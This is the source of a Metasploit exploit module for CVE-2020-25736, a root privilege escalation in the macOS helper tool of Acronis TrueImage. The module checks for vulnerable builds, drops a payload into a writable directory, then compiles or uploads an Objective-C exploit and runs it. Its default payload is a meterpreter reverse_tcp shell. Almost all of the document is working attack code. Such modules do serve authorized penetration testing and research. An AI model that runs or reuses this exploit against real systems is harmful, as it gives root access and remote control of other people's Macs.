Acronis TrueImage XPC Privilege Escalation

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Common
  include Msf::Post::Process
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Acronis TrueImage XPC Privilege Escalation',
        'Description' => %q{
          Acronis TrueImage versions 2019 update 1 through 2021 update 1
          are vulnerable to privilege escalation. The `com.acronis.trueimagehelper`
          helper tool does not perform any validation on connecting clients,
          which gives arbitrary clients the ability to execute functions provided
          by the helper tool with `root` privileges.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Csaba Fitzl', # @theevilbit - Vulnerability Discovery
          'Shelby Pace' # Metasploit Module and Objective-c code
        ],
        'Platform' => [ 'osx' ],
        'Arch' => [ ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [[ 'Auto', {} ]],
        'Privileged' => true,
        'References' => [
          [ 'CVE', '2020-25736' ],
          [ 'URL', 'https://kb.acronis.com/content/68061' ],
          [ 'URL', 'https://attackerkb.com/topics/a1Yrvagxt5/cve-2020-25736' ]
        ],
        'DefaultOptions' => {
          'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp',
          'WfsDelay' => 15
        },
        'DisclosureDate' => '2020-11-11',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
        }
      )
    )

    register_options([
      OptString.new('WRITABLE_DIR', [ true, 'Writable directory to write the payload to', '/tmp' ]),
      OptString.new('SHELL', [ true, 'Shell to use for executing payload', '/bin/zsh' ]),
      OptEnum.new('COMPILE', [ true, 'Compile exploit on target', 'Auto', [ 'Auto', 'True', 'False' ] ])
    ])
  end

  def tmp_dir
    datastore['WRITABLE_DIR'].to_s
  end

  def sys_shell
    datastore['SHELL'].to_s
  end

  def compile
    datastore['COMPILE']
  end

  def compile_on_target?
    return false if compile == 'False'

    if compile == 'Auto'
      ret = cmd_exec('xcode-select -p')
      return false if ret.include?('error: unable')
    end

    true
  end

  def exp_file_name
    @exp_file_name ||= Rex::Text.rand_text_alpha(5..10)
  end

  def check
    helper_location = '/Library/PrivilegedHelperTools'
    helper_svc_names = [ 'com.acronis.trueimagehelper', 'com.acronis.helpertool' ]
    plist = '/Applications/Acronis True Image.app/Contents/Info.plist'

    unless helper_svc_names.any? { |svc_name| file?("#{helper_location}/#{svc_name}") }
      return CheckCode::Safe
    end

    return CheckCode::Detected('Service found, but cannot determine version via plist') unless file?(plist)

    plutil_cmd = "plutil -extract CFBundleVersion raw \'#{plist}\'"
    build_no = cmd_exec(plutil_cmd)
    return CheckCode::Detected('Could not retrieve build number from plist') if build_no.blank?

    build_no = build_no.to_i
    vprint_status("Found build #{build_no}")
    return CheckCode::Appears('Vulnerable build found') if build_no > 14170 && build_no < 33610

    CheckCode::Safe('Acronis version found is not vulnerable')
  end

  def exploit
    payload_name = Rex::Text.rand_text_alpha(7)
    @payload_path = "#{tmp_dir}/#{payload_name}"

    print_status("Attempting to write payload at #{@payload_path}")
    unless upload_and_chmodx(@payload_path, generate_payload_exe)
      fail_with(Failure::BadConfig, 'Failed to write payload. Consider changing WRITABLE_DIR option.')
    end
    vprint_good("Successfully wrote payload at #{@payload_path}")

    @pid = get_valid_pid
    exp_bin_path = "#{tmp_dir}/#{exp_file_name}"

    if compile_on_target?
      exp_src = "#{exp_file_name}.m"
      exp_path = "#{tmp_dir}/#{exp_src}"
      compile_cmd = "gcc -framework Foundation #{exp_path} -o #{exp_bin_path}"

      unless write_file(exp_path, objective_c_code)
        fail_with(Failure::BadConfig, 'Failed to write Objective-C exploit to disk. WRITABLE_DIR may need to be changed')
      end
      register_files_for_cleanup(@payload_path, exp_path, exp_bin_path)

      ret = cmd_exec(compile_cmd)
      fail_with(Failure::UnexpectedReply, "Failed to compile #{exp_src}") unless ret.blank?

      print_status("Successfully compiled #{exp_src}...Now executing payload")
    else
      print_status("Using pre-compiled exploit #{exp_bin_path}")
      compiled_exploit = compiled_exp
      unless upload_and_chmodx(exp_bin_path, compiled_exploit)
        fail_with(Failure::BadConfig, 'Failed to write compiled exploit. Consider changing WRITABLE_DIR option.')
      end

      register_files_for_cleanup(exp_bin_path, @payload_path)
    end

    cmd_exec(exp_bin_path)
  end

  def objective_c_code
    file_contents = exploit_data('CVE-2020-25736', 'acronis-exp.erb')
    ERB.new(file_contents).result(binding)
  rescue Errno::ENOENT
    fail_with(Failure::NotFound, 'ERB payload file not found')
  end

  def compiled_exp
    compiled = exploit_data('CVE-2020-25736', 'acronis-exp.macho')
    compiled.gsub!('/tmp/payload', @payload_path)
    compiled.gsub!('/bin/zsh', sys_shell)
    compiled.gsub!("\xEF\xBE\xAD\xDE".force_encoding('ASCII-8BIT'), [@pid.to_i].pack('V'))

    compiled
  end

  def get_valid_pid
    procs = get_processes
    return '1' if procs.empty?

    len = procs.length
    rand_proc = procs[rand(1...len)]
    return '1' if rand_proc['pid'].to_s.blank?

    rand_proc['pid'].to_s
  end
end